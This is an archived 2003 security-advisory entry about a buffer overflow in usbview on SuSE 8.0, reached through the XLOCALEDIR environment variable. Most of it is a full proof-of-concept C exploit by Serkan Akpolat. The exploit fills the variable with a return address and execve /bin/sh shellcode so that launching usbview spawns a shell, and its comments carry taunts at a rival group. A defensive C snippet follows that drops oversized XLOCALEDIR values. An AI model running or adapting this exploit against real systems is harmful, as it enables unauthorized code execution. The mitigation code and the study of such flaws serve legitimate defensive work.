6th Apr 2003 [SBWID-6115]
COMMAND
Usbview exploit
SYSTEMS AFFECTED
Usbview on SuSE 8.0 (at least)
PROBLEM
Thanks to Serkan Akpolat [[email protected]] for this post:
+-------------------------------
/* Proof of Concept Code for buffer overflow vulnerability in usbview */
/* usbview uses xf86 libs, which have unsafe strcopy, as it's explained in oC-localX.c */
/* Long string in XLOCALEDIR env variable causes segmentation fault */
/* Usbview, which comes with SuSE 8.0, isn't by default setuid root */
/* This code has been tested in SuSE 8.0 */
/* It spawns a shell with the uid of the user who runs the exploit */
/* Greetings to Avicenna, Hackpimp, Murat Balaban, core.gen.tr team. */
/* To Rooting Sabotage Forced, its derivatives and their lackey crew: you will */
/* not get anywhere by trying to fool people with your basic knowledge. */
/* (I wrote this in Turkish because you cannot understand English.) */
/* Written by Serkan Akpolat For Fun [email protected] */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 6000
#define PATH "/usr/bin/usbview"
#define PROGNAME "usbview"
const char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
/* execve /bin/sh */
/* Shellcode from "Buffer Overflow" paper of Murat Balaban */
int main(void)
{
    char *envv=NULL;
    char buf[BUFSIZE];
    int i,j,ret;
    int *ap;

    ap = (int *)(buf);
    ret = 0xbfffe86f;
    printf("Shellcode is on 0x%08x , Press Enter For a Shell\n",ret);
    for (i = 0; i < BUFSIZE -4; i += 4)
        *ap++ = ret;
    memcpy(buf + 4, shellcode, strlen(shellcode));
    setenv("XLOCALEDIR", buf, 1);
    getchar();
    execl(PATH,PROGNAME,NULL);
}
SOLUTION
?
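
The check below is an added example, not part of the original post and not code from usbview or the X libraries. It shows one stopgap a launcher could apply before starting an X client: drop XLOCALEDIR from the environment unless it looks like an ordinary directory path. The function names, the 1024-byte limit and the printable-ASCII rule are assumptions made for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed policy limit for this example; not a value taken from the X libraries. */
#define XLOCALEDIR_MAX 1024

/* Returns 1 if value looks like a sane directory path, 0 otherwise. */
static int xlocaledir_is_sane(const char *value)
{
    size_t i;

    if (value == NULL || value[0] != '/')
        return 0;                   /* require an absolute path */
    for (i = 0; value[i] != '\0'; i++) {
        unsigned char c = (unsigned char)value[i];

        if (i >= XLOCALEDIR_MAX)
            return 0;               /* oversized value, as in the 6000-byte case above */
        if (c < 0x20 || c > 0x7e)
            return 0;               /* control or high-bit bytes are rejected */
    }
    return 1;
}

/* Removes XLOCALEDIR from the environment unless it passes the check.
 * Returns 1 if the variable was removed, 0 if it was absent or kept. */
int scrub_xlocaledir(void)
{
    const char *value = getenv("XLOCALEDIR");

    if (value == NULL || xlocaledir_is_sane(value))
        return 0;
    fprintf(stderr, "dropping suspicious XLOCALEDIR (%lu+ bytes)\n",
            (unsigned long)strnlen(value, XLOCALEDIR_MAX + 1));
    unsetenv("XLOCALEDIR");
    return 1;
}
```

A launcher would call scrub_xlocaledir() immediately before exec'ing the X client; this narrows exposure through this one variable and does not replace fixing the unbounded copy in the library.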